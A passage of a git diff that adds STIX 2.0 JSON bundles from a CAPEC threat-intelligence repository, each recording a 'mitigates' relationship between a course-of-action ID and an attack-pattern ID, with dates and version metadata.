"2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--00382075-fd38-4145-ac07-88fa46ab5e82.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--00382075-fd38-4145-ac07-88fa46ab5e82.json new file mode 100644 index 0000000000000000000000000000000000000000..78c136e7b9bda5dfbb1fad4a1f5044cbb93e39ed --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--00382075-fd38-4145-ac07-88fa46ab5e82.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--814a7eff-4b86-46d2-ab56-3409ef3d6b3e", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00382075-fd38-4145-ac07-88fa46ab5e82", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--006acdf6-fa11-4dbc-b447-35cfd3577991.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--006acdf6-fa11-4dbc-b447-35cfd3577991.json new file mode 100644 index 0000000000000000000000000000000000000000..6395eb37bc7de9b4b95b13cfdbea981d38e82118 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--006acdf6-fa11-4dbc-b447-35cfd3577991.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--6960cb6e-48ec-4566-993d-7b68fe5a7cfa", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--006acdf6-fa11-4dbc-b447-35cfd3577991", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf22f1fa-b5cb-4733-a825-810c681f76aa", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--007dc896-33a1-418f-8400-a4ae48f79658.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--007dc896-33a1-418f-8400-a4ae48f79658.json new file mode 100644 index 0000000000000000000000000000000000000000..78c9a70f86428c51b663f5be6a5fdb75534466bd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--007dc896-33a1-418f-8400-a4ae48f79658.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--da618b71-4fde-4cf2-8cec-fd66a6f445eb", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--007dc896-33a1-418f-8400-a4ae48f79658", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86466080-30aa-42b1-a6cc-f8103cf49498", + "target_ref": "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6.json new file mode 100644 index 0000000000000000000000000000000000000000..95caa4ab2c171fb62a43a92e5e19da3549065890 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--11a777fa-19fc-4421-9e27-925ed461657d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56.json new file mode 100644 index 0000000000000000000000000000000000000000..b984f02ca5f5f1786d09d2b8da35073c38fe3a79 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--31fb90da-894a-47b0-a1a7-2b2797885a57", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "target_ref": "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1.json new file mode 100644 index 0000000000000000000000000000000000000000..555aa59d673015f1649bc05919e03cea423794d2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--c8cf995f-c4ea-4b99-b9ad-e86fe77b7f6d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b.json new file mode 100644 index 0000000000000000000000000000000000000000..8d40d7ee5f5dc096b0948691a9439c9c68e1e4e2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--79cbfcd9-f877-43c2-9ae7-d42d1ad3c816", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6de86e67-2849-4490-9556-799ba134737f", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8.json new file mode 100644 index 0000000000000000000000000000000000000000..65a0f42697bfba4d1c4237e9b0c3640f35b94e7a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--e1fd9e4c-3f9d-4872-b0a3-d16c67a6aae4", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0174af7d-b07c-4326-98d7-485d81f6876c.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0174af7d-b07c-4326-98d7-485d81f6876c.json new file mode 100644 index 0000000000000000000000000000000000000000..4c91814304a7c6239670594424d9dbc6032e38ae --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0174af7d-b07c-4326-98d7-485d81f6876c.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--79fdeba4-bb49-4e7f-8d1d-1cdf8c007111", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0174af7d-b07c-4326-98d7-485d81f6876c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7", + "target_ref": "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "type": "relationship", + "x_capec_version": "3.8" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954.json new file mode 100644 index 0000000000000000000000000000000000000000..e12653f9e480cf95311cc83d736617abe65b621d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--f853ba5f-7294-4707-a506-47bec3db02f1", + "objects": [ + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660.json new file mode 100644 index 0000000000000000000000000000000000000000..23005d3cdf0b064b5412ca2b84bcb50f7ddd933c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--514bbce7-b27c-4d9f-83e6-36ffb97a69df", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2b357357-88e4-40f9-9345-ada3db593ff5", + "target_ref": "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a.json new file mode 100644 index 0000000000000000000000000000000000000000..1b10908c08ac51a5abf83c61695f06afd36d6cbb --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--73a88d72-5f6f-4a42-bf8c-be27f9a397da", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "target_ref": "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--02109430-cdab-456f-831f-cbf8dc34209a.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--02109430-cdab-456f-831f-cbf8dc34209a.json new file mode 100644 index 0000000000000000000000000000000000000000..ebd8c162891ecadbbb43394d0cff81d425eaa8ba --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--02109430-cdab-456f-831f-cbf8dc34209a.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--1c0baafb-fb6f-453d-8113-e1c96e459593", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02109430-cdab-456f-831f-cbf8dc34209a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7cdc228e-d1d1-40c4-b9c4-9e9f89b3df71", + "target_ref": "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--02819a54-8939-497c-b2eb-faaac80cabf0.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--02819a54-8939-497c-b2eb-faaac80cabf0.json new file mode 100644 index 0000000000000000000000000000000000000000..5b0043398a5ce80d6b31293994f35390f6855a5c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--02819a54-8939-497c-b2eb-faaac80cabf0.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--287aae00-759b-4cca-b091-882b1b9ce3c3", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02819a54-8939-497c-b2eb-faaac80cabf0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6.json new file mode 100644 index 0000000000000000000000000000000000000000..6802cfe45d9e21cf796acec1feb2c58a3bea56bb --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--30ac9bd2-8137-4d59-8a6c-ae63b201a255", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c080d71-9309-4804-877c-86e391e4b059", + "target_ref": "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--03a4f7c0-05b3-44e7-b7fa-5e51c7216743.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--03a4f7c0-05b3-44e7-b7fa-5e51c7216743.json new file mode 100644 index 0000000000000000000000000000000000000000..64cf1330e94869c83d94deb09066b7373681d3f6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--03a4f7c0-05b3-44e7-b7fa-5e51c7216743.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--629ca3ee-1039-433a-8e93-ad9527bd25a3", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03a4f7c0-05b3-44e7-b7fa-5e51c7216743", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3ed0f42c-e94a-4d92-be95-06df4d69c7b7", + "target_ref": "attack-pattern--36a2f844-0c20-41d7-9a10-66f1e4c43db8", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--03ca0e49-f51b-444a-bfae-ac04853513a4.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--03ca0e49-f51b-444a-bfae-ac04853513a4.json new file mode 100644 index 0000000000000000000000000000000000000000..788e5dbe925673b0ad8e051aed7a685b468775fe --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--03ca0e49-f51b-444a-bfae-ac04853513a4.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--4cf9231b-34f7-4eda-ac49-44d24192183f", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03ca0e49-f51b-444a-bfae-ac04853513a4", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--768de10a-6dae-46e1-88e8-fac5a8033e51", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--03fec1aa-4921-455b-89f5-01af59405338.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--03fec1aa-4921-455b-89f5-01af59405338.json new file mode 100644 index 0000000000000000000000000000000000000000..12dd78ca5ce400bd361df1b22d33811d78446424 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--03fec1aa-4921-455b-89f5-01af59405338.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--96f3dbb9-ad46-4def-bc74-f219105c992e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03fec1aa-4921-455b-89f5-01af59405338", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64ccbe5a-017d-44f3-9f60-79e90c24af52", + "target_ref": "attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--041ce232-81d4-4940-904b-9b54892a622c.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--041ce232-81d4-4940-904b-9b54892a622c.json new file mode 100644 index 0000000000000000000000000000000000000000..4671d0fac7300e9ebf96f240fb88b50842ae9dd2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--041ce232-81d4-4940-904b-9b54892a622c.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--f7a65214-ea5c-4598-848d-117f1a0479a4", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--041ce232-81d4-4940-904b-9b54892a622c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--75e2e783-d31a-4fa4-9ea6-6ae04e366cb4", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.7" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04308827-581a-464a-8378-efed9a9a7476.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04308827-581a-464a-8378-efed9a9a7476.json new file mode 100644 index 0000000000000000000000000000000000000000..c698b5c401621c36c54add507dbe5c24a9c737e8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04308827-581a-464a-8378-efed9a9a7476.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--7e707b2a-9dcc-4373-a05a-7d87e19aeb09", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04308827-581a-464a-8378-efed9a9a7476", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--031e02fe-84e7-4908-b507-e836876da1ab", + "target_ref": "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04696e3f-623a-46fd-bd0e-c253d001cba3.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04696e3f-623a-46fd-bd0e-c253d001cba3.json new file mode 100644 index 0000000000000000000000000000000000000000..753b32fa7b2d9552a20881891f84967f671e60fa --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04696e3f-623a-46fd-bd0e-c253d001cba3.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--73406f0f-f9e2-43ec-a675-81415993cd46", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04696e3f-623a-46fd-bd0e-c253d001cba3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb143d8a-cf0a-4047-99fb-e6c8751f522b", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2.json new file mode 100644 index 0000000000000000000000000000000000000000..e55cafe82ed2a2153e1ad85801cbf6ffbd6d03b6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--0e6013b8-f362-4677-8ffe-a263d712b864", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04915a3b-b205-4fc6-8701-3035bdceff35.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04915a3b-b205-4fc6-8701-3035bdceff35.json new file mode 100644 index 0000000000000000000000000000000000000000..d9c40e981294a256303b91ced9994955e67faecd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04915a3b-b205-4fc6-8701-3035bdceff35.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--5ead7480-40b9-44cf-b419-aecc39007277", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04915a3b-b205-4fc6-8701-3035bdceff35", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0492ba63-8134-4235-a371-e1cf83184a85.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0492ba63-8134-4235-a371-e1cf83184a85.json new file mode 100644 index 0000000000000000000000000000000000000000..cdab1b367dfc1df2e1f8676f9cee68e1b186e42c --- 